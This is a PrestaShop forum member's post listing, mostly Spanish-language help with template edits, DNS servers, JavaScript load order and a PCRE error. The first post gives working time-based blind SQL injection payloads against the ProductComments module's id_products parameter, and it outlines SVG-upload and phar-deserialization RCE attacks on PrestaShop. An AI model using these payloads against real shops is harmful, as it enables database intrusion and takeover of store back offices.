Jump to content

tamu secreto

Members
  • Posts

    1,133
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by tamu secreto

  1. SQL Injection Parameter: id_product utility charger : 1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt) example: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt) ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=[SQL] Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2))) Cross-Site Request Forgery The file manager, which allows the following files to be uploaded. jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma, flv, webm The SVG file upload can contain Javascript code. Remote Code Execution Vulnerable Package Link: https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip Apli: PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x - Back Office Remote Code Execution Chaining multiple vulnerabilities to trigger deserialization via phar back-office-url email password func param. The values were changed, to a good understanding few words. The exploits are functional !!馃檮 greetings luck !馃槆
  2. 馃え y por que posteo la direccion de directorio admin en un foro concurrido... de todos modos siempre se puede establecer la estructura de directorio utilizando alguna distro pero es en ocasiones trabajoso y se supone que de eso se trata de hacerlo tan facil para los pillos RENOMBRE SU DIRECTORIO ADMIN O EDITE SU PRIMER POST, si es que le preocupa la seguridad. saludos
  3. La mejor opci贸n ser铆a utilizar un modulo que haga hook displayAfterProductThumbs (si mal no recuerdo) para que el video no se cargue en moviles se puede usar varios recursos, por ejemplo al instalar el modulo crear su configuracion como no disponible en moviles, otra opci贸n seria configuar el modulo desde prestashop una vez instalado para que no se visualice en moviles y la mas rebuscada seria incorporar codigo php o smarty utilizando una funcion que tome de la classe tools el navegador o movil y tomar una accion para el caso de if o else :) Con relaci贸n a utilizar iframe No es recomendable, ya que en una tienda se suele buscar ese tipo contenido para robo se sesiones y demas cosas que hacen la gente mala :D Parece complicado pero no lo es, puede buscar en le foro un modulo gratuito que he subido hace tiempo que inserta video en productos utilizando fancy. Es para versiones anteriores de prestashop pero vera que no es dificil adaptarlo, solo debera cambiar los hooks y la funcion de carga de tpl. saludos
  4. 馃槯馃槯 ni me recordaba de este modulo, 馃檮 no recuerdo como lo hice ni cuando. voy descargarlo y subir una version para PS 1.7.x y ver que puedo mejorar. 馃槴 disculpen!
  5. 馃槸 doscientos euros! yo puedo hacer uno asi por cincuenta euros 馃槅
  6. Level3 鈥 209.244.0.3 y 209.244.0.4 IBM Quad9 鈥 9.9.9.9 Verisign 鈥 64.6.64.6 y 64.6.65.6 Google 鈥 8.8.8.8 y 8.8.4.4 WATCH 鈥 84.200.69.80 y 84.200.70.40 Comodo Secure DNS 鈥 8.26.56.26 y 8.20.247.20 OpenDNS Home 鈥 208.67.222.222 y 208.67.220.220 DNS Advantage 鈥 156.154.70.1 y 156.154.71.1 Norton ConnectSafe 鈥 199.85.126.10 y 199.85.127.10 GreenTeamDNS 鈥 81.218.119.11 y 209.88.198.133 SafeDNS 鈥 195.46.39.39 y 195.46.39.40 OpenNIC 鈥 96.90.175.167 y 193.183.98.154 SmartViper 鈥 208.76.50.50 y 208.76.51.51 Dyn 鈥 216.146.35.35 y 216.146.36.36 FreeDNS 鈥 37.235.1.174 y 37.235.1.177 Alternate DNS 鈥 198.101.242.72 y 23.253.163.53 DNS 鈥 77.88.8.8 y 77.88.8.1 UncensoredDNS 鈥 91.239.100.100 y 89.233.43.71 Hurricane Electric 鈥 74.82.42.42 FoolDNS 鈥 87.118.111.215 y 213.187.11.67 puntCAT 鈥 109.69.8.51 Cloudflare 1.1.1.1 y 1.0.0.1 ( Cloudflare Afirma que es el m谩s r谩pido y m谩s privado que existe) tools interesantes: https://code.google.com/archive/p/namebench/downloads https://www.malavida.com/es/soft/dns-jumper/ de todos modos no creo que lo del backoffice lento tenga que ver con DNS 馃槱 habria que ver que es lo que estas usando y como lo has configurado...
  7. Bien!!! lo mas rapido seria adicionar el style directamente es mas rapido de explicar <textarea style="background:#FFF;" rows="2" cols="120" id="delivery_message" name="delivery_message"> salu2!
  8. Pues obviamente si no desea mostrar el contenido por defecto tiene que comentar No elmine nada simplemente envuelva el codigo que no quiere imprimir con {* aca el codigo que no quiero mostrar *} todo lo que este dentro de {* *} no se mostrara. es recomendable no eliminar nada. saludos
  9. creo que si edita el archivo category.tpl del theme en cuestions, usando {* *} para no mostrar lo que no quiere. en su caso si quiere ocultar el nombre de abajo: prestashop 1.6.x {* <h1 class="page-heading{if (isset($subcategories) && !$products) || (isset($subcategories) && $products) || !isset($subcategories) && $products} product-listing{/if}"><span class="cat-name">{$category->name|escape:'html':'UTF-8'}{if isset($categoryNameComplement)}&nbsp;{$categoryNameComplement|escape:'html':'UTF-8'}{/if}</span>{include file="$tpl_dir./category-count.tpl"}</h1> *} en prestashop 1.7 {* <div class="text-sm-center hidden-md-up"> <h1 class="h1">{$category.name}</h1> </div> *}
  10. pues por lo que veo tampoco esta alli lo que desea Vemos casi al final del archivo que usted ha subido he allado esto: {include file="$tpl_dir./sub/product_info/default.tpl"} por lo que entiendo su theme posee un directorio sub/product_info busque alli el archivo defualt.tpl seguro encontrara algo asi: <div class="ALGUN_ESTILO_NI_IDEA">{$product->description}</div> Simplemente utilice esa linea de codigo para insertarla donde desee, por ejemplo usando el archivo product.tpl que ha subido vamos colocar la descripcion larga en teoria debajo del boton comprar: <div class="box-cart-bottom"> <div {if (!$allow_oosp && $product->quantity <= 0) || !$product->available_for_order || (isset($restricted_country_mode) && $restricted_country_mode) || $PS_CATALOG_MODE} class="unvisible"{/if}> <p id="add_to_cart" class="buttons_bottom_block no-print"> <button type="submit" name="Submit" class="exclusive btn btn-outline-inverse status-enable"> <span>{if $content_only && (isset($product->customization_required) && $product->customization_required)}{l s='Customize'}{else}{l s='Add to cart'}{/if}</span> </button> </p> </div> {if isset($product->description)} <div class="ALGUN_ESTILO_DE_SU_THEME">{$product->description}</div> {/if} </div> <!-- end box-cart-bottom --> use if isset para que solo se muestre el contenido si ha sido enviado, en fin no hay mucho secreto solo tiene que colocar el fragmento siguiente donde desee: {if isset($product->description)} <div class="algun_estilo_de_theme">{$product->description}</div> {/if} algun_estilo_de_su_theme es un ejemplo usted utilice la linea de codigo tal cual esta en su archivo tpl. saludos
  11. Busque en el archivo order-carrier.tpl de su theme <textarea class="form-control" cols="120" rows="2" name="message" id="message"> cambie el valor 120 de cols por uno menor hasta que se ajuste a sus necesidades ejemplo: <textarea class="form-control" cols="100" rows="2" name="message" id="message"> saludos!
  12. La paginas prestashop utilizan un id name puede utilizar esta variable para capturar la pagina y jugar con eso por ejemplo edite el archivo tpl que desea y en el campo dni o o el que quiera agregue algo asi: <input type="text" {if $page_name == 'NOMBRE_DE_LA_PAGINA'} required {/if}> es un camino... otro ejemplo y mas razonable seria: <input type="text" {if isset($page_name) and $page_name == 'NOMBRE_PAGINA'} required {/if}> NOTA: para ver el nombre de la pagina en cuestion haga puede hacer esto: ingrese a la pagina donde aparece el formulario, haga clic boton derecho ver codigo fuente y observe el valor que se encuentra en: <body id='ACA APARECE EL NOMBRE'.... copie el nombre y pruebe con los ejemplos dados, obvio en los tpl correspondientes.. saludos
  13. ha probado con forzar compilacion. otro punto es que no se que version de prestashop esta utilizando y que archivo a modificado.. saludos
  14. no entiendo pero seguramente se trata de una etiqueta h1 o h2 o h3, div, etc esta debe tener una classe relacionada en su archivo css, los anchos y alto pueden darse con "height" y "width". edito para no confundirlo demasiado.. busque la etiqueta que contine el titulo (en el archivo TPL correspondiente) por ejemplo si es un div agregue esto: style="min-height: 92px" guarde. ejemplo con completo con h1 <h1 style="min-height: 92px">aca esta el titulo</h1> /** en fin debe indentificar la etiqueta que contiene el titulo */ saludos
  15. Pues de ahi nada, por que lo que quiere no esta ahi ahora si quiere puede habilitar el link a la descripcion larga en ese caso puede descomentar el codigo y se mostrar谩 lo que esta entre {* *} osea: </p> {/if} *} {if $product->description_short || $packItems|@count > 0} <div id="short_description_block"> {if $product->description_short} <div id="short_description_content" class="rte align_justify" itemprop="description">{$product->description_short}</div> {/if} <h3>{if $product->description}</h3> <p class="buttons_bottom_block"> <a href="javascript:{ldelim}{rdelim}" class="button"> {l s='More details'} </a> </p> {/if} {/if} {if $packItems|@count > 0} <div class="short_description_pack"> {l s='Pack content'} {foreach from=$packItems item=packItem} <div class="pack_content"> {$packItem.pack_quantity} x <a href="{$link->getProductLink($packItem.id_product, $packItem.link_rewrite, $packItem.category)|escape:'html':'UTF-8'}">{$packItem.name|escape:'html':'UTF-8'}</a> <p>{$packItem.description_short}</p> </div> {/foreach} </div> {/if} </div> <!-- end short_description_block --> de todos modos esta mal comentado lo el {* debe estar antes de la etiqueta <h3> y no despues. seria bueno ver todo el archivo toqueteado para ver que otra cosa esta mal suba el archivo tpl para poder ayudarlo. saludos
  16. Pos video en home nada mas, 驴es un modulo? o es una pagina que linkea a la tienda, por que yo recuerde no existe un modulo video oficial que venga por defecto en prestashop. Podria ayudarlo mejor si pone un link a la pagina encuestion. saludos
  17. escriba solucionado en el titulo asi la buena gente como yo :S no entra ayudar
  18. eso suele suceder cuando existe un archivo js que utiliza fancybox o jquery pero resulta que se esta cargando primero antes que los jquery y/o fancybox La solucion forzar compilacion. desintalar el modulo y volver a instalarlo, o llamar al plugins desde el tpl OJO, no digo que sea el caso, pero a veces sucede eso por error en la prioridad de carga... si usa un js el modulo o archivo verifique que el orden de carga sea algo asi: jquery fancybox plugins su_js_aca.<---- creo que las ultimas version prestashop traen un metodo de prioridad para los js, pero no estoy seguro, tal vez me estoy confundiendo con otra cosa saludos
  19. se supone que poner _PS_MODE_DEV_ en true es para imprimir los errores en pantalla. Pero si su tienda funcionaba bien, vuelva sus pasos hacia atras, por ejemplo si ha instalado un modulo de tercero desactivelo. Si no logra ver los errores en pantalla, habra su archivo index.php <?php /* justo despues de eso escriba*/ error_reporting(-1); /* guarde el archivo */ pruebe a ver que imprime, la otra es revisar el log de su hosting. saludos
  20. Hola que tal, pues no me queda claro lo que precisa pero veamos si puedo orientarlo: 1 - si quiere ocultar algo en un archivo tpl puede utilizar {* aca lo que quiere ocultar *} es una opci贸n usar metodo de comentario de smarty. Pero tenga encuenta que cada formulario tiene un archivo action que esperar谩 TAL VEZ recibir el parametro que esta queriendo ocultar. 2- con respecto al Captcha, ignoro como esta empleando esta acci贸n, pero por lo general se trata de evitar cache de smarty para este tipo de acciones por ejemplo puede utilizar en el tpl {nocache} {$aqui_variable_captcha_generada_como_sea} {/nocache} En fin es una orientaci贸n, existen diversas formas de realizar esto en php y smarty, pero tendria que tener el codigo que esta empleando para ayudarlo mas.. saludos
  21. Pues una consulta nadie a testeado mi modulo https://www.prestashop.com/forums/topic/631314-modulefree-modulo-redsys-tpv-virtual-official-validation-documentation/?page=0#comment-2620407 Quiero actualizarlo y subirlo al addons para descarga gratuita, pero necesito que lo prueben. saludos
  22. Pattern Modifiers The current possible PCRE modifiers are listed below. The names in parentheses refer to internal PCRE names for these modifiers. Spaces and newlines are ignored in modifiers, other characters cause error. i (PCRE_CASELESS) m (PCRE_MULTILINE) s (PCRE_DOTALL) x (PCRE_EXTENDED) e (PREG_REPLACE_EVAL) Warning This feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0. http://php.net/manua...n.modifiers.php http://php.net/manua...n.modifiers.php Whoops, looks like something went wrong. 3/3 DriverException in AbstractMySQLDriver.php line 115: An exception occurred while executing 'SELECT p0_.id_translation AS id_translation_0, p0_.`key` AS key_1, p0_.translation AS translation_2, p0_.domain AS domain_3, p0_.theme AS theme_4, p0_.id_lang AS id_lang_5 FROM ps_translation p0_ WHERE p0_.id_lang = ? AND p0_.theme IS NULL AND (p0_.domain REGEXP ?) = 1' with params [1, "ModulesFacetedsearchShop"]: SQLSTATE[42000]: Syntax error or access violation: 1139 Got error 'this version of PCRE is not compiled with Unicode property suppo' from regexp 1. in AbstractMySQLDriver.php line 115 2. at AbstractMySQLDriver->convertException('An exception occurred while executing 'SELECT p0_.id_translation AS id_translation_0, p0_.`key` AS key_1, p0_.translation AS translation_2, p0_.domain AS domain_3, p0_.theme AS theme_4, p0_.id_lang AS id_lang_5 FROM ps_translation p0_ WHERE p0_.id_lang = ? AND p0_.theme IS NULL AND (p0_.domain REGEXP ?) = 1' with params [1, "ModulesFacetedsearchShop"]: SQLSTATE[42000]: Syntax error or access violation: 1139 Got error 'this version of PCRE is not compiled with Unicode property suppo' from regexp', object(PDOException)) in DBALException.php line 128 3. at DBALException::driverExceptionDuringQuery(object(Driver), object(PDOException), 'SELECT p0_.id_translation AS id_translation_0, p0_.`key` AS key_1, p0_.translation AS translation_2, p0_.domain AS domain_3, p0_.theme AS theme_4, p0_.id_lang AS id_lang_5 FROM ps_translation p0_ WHERE p0_.id_lang = ? AND p0_.theme IS NULL AND (p0_.domain REGEXP ?) = 1', array('1', 'ModulesFacetedsearchShop')) in Connection.php line 855 4. at Connection->executeQuery('SELECT p0_.id_translation AS id_translation_0, p0_.`key` AS key_1, p0_.translation AS translation_2, p0_.domain AS domain_3, p0_.theme AS theme_4, p0_.id_lang AS id_lang_5 FROM ps_translation p0_ WHERE p0_.id_lang = ? AND p0_.theme IS NULL AND (p0_.domain REGEXP ?) = 1', array('1', 'ModulesFacetedsearchShop'), array('integer', '2'), null) in SingleSelectExecutor.php line 50 5. at SingleSelectExecutor->execute(object(Connection), array('1', 'ModulesFacetedsearchShop'), array('integer', '2')) in Query.php line 321 6. at Query->_doExecute() in AbstractQuery.php line 969 7. at AbstractQuery->executeIgnoreQueryCache(null, '1') in AbstractQuery.php line 924 8. at AbstractQuery->execute(null, '1') in AbstractQuery.php line 727 9. at AbstractQuery->getResult() in DatabaseTranslationLoader.php line 83 10. at DatabaseTranslationLoader->load('ModulesFacetedsearchShop.en-US.db', 'en-US', 'ModulesFacetedsearchShop') in Translator.php line 416 11. at Translator->doLoadCatalogue('en-US') in Translator.php line 306 12. at Translator->initializeCatalogue('en-US') in Translator.php line 113 13. at Translator->initializeCatalogue('en-US') in Translator.php line 349 14. at Translator->dumpCatalogue('en-US', object(ResourceCheckerConfigCache)) in Translator.php line 329 15. at Translator->Symfony\Component\Translation\{closure}(object(ResourceCheckerConfigCache)) 16. at call_user_func(object(Closure), object(ResourceCheckerConfigCache)) in ResourceCheckerConfigCacheFactory.php line 46 17. at ResourceCheckerConfigCacheFactory->cache('/opt/lampp/htdocs/1721/app/cache/dev/translations/catalogue.en- US.3fea97234267aa02290eee8ee5357fb280cfa275.php', object(Closure)) in Translator.php line 330 18. at Translator->initializeCacheCatalogue('en-US') in Translator.php line 294 19. at Translator->loadCatalogue('en-US') in Translator.php line 248 20. at Translator->getCatalogue('en-US') in Translator.php line 209 21. at Translator->trans('You do not have permission to add this.', array(), 'AdminNotificationsError', null) in PrestaShopTranslatorTrait.php line 49 22. at Translator->trans('You do not have permission to add this.', array(), 'AdminNotificationsError', null) in LoggingTranslator.php line 50 23. at LoggingTranslator->trans('You do not have permission to add this.', array(), 'AdminNotificationsError', null) in DataCollectorTranslator.php line 50 24. at DataCollectorTranslator->trans('You do not have permission to add this.', array(), 'AdminNotificationsError', null) in PrestaShopTranslatorTrait.php line 49 25. at DataCollectorTranslator->trans('You do not have permission to add this.', array(), 'AdminNotificationsError') in ModuleController.php line 75 26. at ModuleController->catalogAction() 27. at call_user_func_array(array(object(ModuleController), 'catalogAction'), array()) in bootstrap.php.cache line 3247 28. at HttpKernel->handleRaw(object(Request), '1') in bootstrap.php.cache line 3206 29. at HttpKernel->handle(object(Request), '1', false) in bootstrap.php.cache line 3360 30. at ContainerAwareHttpKernel->handle(object(Request), '1', false) in bootstrap.php.cache line 2562 31. at Kernel->handle(object(Request), '1', false) in index.php line 86 The Perl Compatible Regular Expressions (PCRE) library is a set of functions that implement regular expression pattern matching using the same syntax and semantics as Perl 5.This library allow using regular expression in mysql queries. If you are receiving error saying that this version of PCRE is compiled without UTF support at offset 0 this means that your pcre library used in you version does not support UTF 8?? or where is the problem?? mozilla.pdf
×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More